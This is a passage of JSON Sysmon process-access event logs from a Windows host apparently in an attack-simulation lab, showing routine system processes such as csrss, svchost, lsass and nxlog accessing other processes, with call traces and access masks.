C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:44.029","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13D0-5F25-0000-00105C121200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:44.029\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13D0-5F25-0000-00105C121200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:44.029","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13D0-5F25-0000-00105C121200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:44.044\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D0-5F25-0000-00105C121200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:44.044","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13D0-5F25-0000-00105C121200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:44.107\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:44.107","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:45.122\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:45.122","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.138\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.138","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 